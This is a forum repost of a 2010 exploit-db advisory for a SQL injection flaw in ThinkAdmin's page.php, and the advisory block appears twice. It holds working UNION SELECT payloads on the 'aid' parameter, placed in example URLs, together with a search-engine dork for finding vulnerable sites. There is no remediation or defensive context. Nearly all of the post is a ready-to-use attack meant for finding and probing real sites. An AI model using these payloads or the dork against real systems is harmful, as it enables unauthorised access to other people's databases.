AtT4CKxT3rR0r1ST
01-31-2010, 01:46 PM
ThinkAdmin (page.php) Sql Injection Vulnerability (http://www.exploit-db.com/exploits/11296)
###########################################
.:. Author : AtT4CKxT3rR0r1ST
.:. Email : [email protected]
.:. Team : Sec Attack Team
.:. Home : www.sec-attack.com/vb
.:. Script : ThinkAdmin
.:. Script Download: http://www.thinkadmin.net/
.:. Bug Type : Sql Injection[Mysql]
.:. Dork : Powered by ThinkAdmin
.:. Date : 30/1/2010
#############################################
===[ Exploit ]===
www.site.com/page.php?id=21&aid=12[SQL INJECTION]&s=3
www.site.com/page.php?id=21&aid=-12'+union+select+1,version(),3,4,5,6,7,8-- -&s=3
===[ Example ]===
http://server/page.php?id=21&aid=-12'union+select+1,version(),3,4,5,6,7,8-- -&s=3
###########################################
.:. Author : AtT4CKxT3rR0r1ST
.:. Email : [email protected]
.:. Team : Sec Attack Team
.:. Home : www.sec-attack.com/vb
.:. Script : ThinkAdmin
.:. Script Download: http://www.thinkadmin.net/
.:. Bug Type : Sql Injection[Mysql]
.:. Dork : Powered by ThinkAdmin
.:. Date : 30/1/2010
#############################################
===[ Exploit ]===
www.site.com/page.php?id=21&aid=12[SQL INJECTION]&s=3
www.site.com/page.php?id=21&aid=-12'+union+select+1,version(),3,4,5,6,7,8-- -&s=3
===[ Example ]===
http://server/page.php?id=21&aid=-12'union+select+1,version(),3,4,5,6,7,8-- -&s=3